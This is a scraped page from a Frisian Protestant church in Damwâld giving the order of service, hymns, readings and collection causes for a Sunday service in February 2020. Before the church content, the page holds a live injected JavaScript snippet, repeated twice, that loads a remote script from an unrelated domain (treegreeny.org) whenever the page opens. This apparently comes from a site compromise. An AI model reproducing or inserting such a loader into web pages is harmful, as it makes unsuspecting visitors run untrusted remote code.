;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 2 februari 2020 9:30 uur - PKN Damwâld
zondag 2 februari 2020
09:30 uur
Fryske tsjinst

Kerkdienst zondag 2 februari 2020 9:30 uur

Thema: Blydskip yn de Himel

Informatie

Voorganger:Dhr. J. Klimstra
Organist:Henk Hogeveen
Thema:Blydskip yn de Himel
Mededeling:Fryske tsjinst
Liturgie
Sjonge foar de tsjinst: ELB 233: 2, 3, 4
Ynkommen tsjerkeried
Sjonge Psalm 105: 1, 3
Stil gebed, votum, groet
Sjonge Psalm 143: 8
Moarnsgebed
Leefregel : Romeinen 13: 8 – 14
Sjonge Psalm 119: 1, 4, 44
Gebed by it iepenjen fan de Skrift
Skriftlêzing: Lukas 15: 1 – 13 en 20 – 24
Sjonge Gesang 50: 2, 3 (Lieteboek 1977)
Preek .
Sjonge Gesang 654: 1, 2, 4, 5
Gebed
Kollekte
Sjonge Gesang 867
Segen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Medische zorg in Noord-India (Project 10 27 GZB)

Medische zorg in Noord-India (Project 10 27 GZB)
India behoort tot de meest bevolkte landen ter wereld. Er zijn grote verschillen tussen arm en rijk. In veel dorpen in het noorden van India is weinig aandacht voor reinheid en hygiëne. De gezondheid en het welzijn van de bewoners is vaak ronduit slecht. Op initiatief van Christian Reformed Fellowship of India, partner van de GZB, bezoekt een team van artsen en verpleegkundigen deze dorpen om hierin enige verbetering te brengen.

Tweede collecte: Kerk
Uitganscollecte: Werelddiaconaat

Werelddiaconaat: Oeganda – Goed boeren in een lastig klimaat
In het noorden van Oeganda is het niet makkelijk om boer of boerin te zijn. De regen wordt er steeds onvoorspelbaarder door de wereldwijde klimaatverandering. Soms is er droogte, soms staan de velden onder water. Samen met de Kerk van Oeganda steunt Kerk in Actie boerengezinnen in hun strijd om het dagelijks bestaan. Boeren leren nieuwe duurzame technieken voor productie en opslag van gewassen. Ook worden energiezuinige oventjes gemaakt, bomen opnieuw geplant, visvijvers aangelegd en bijenkorven geplaatst. Zo wordt de natuur beter beschermd en hebben boeren een stabiel inkomen. Collecteer mee zodat boeren niet alleen droogte, maar ook wateroverlast het hoofd kunnen bieden.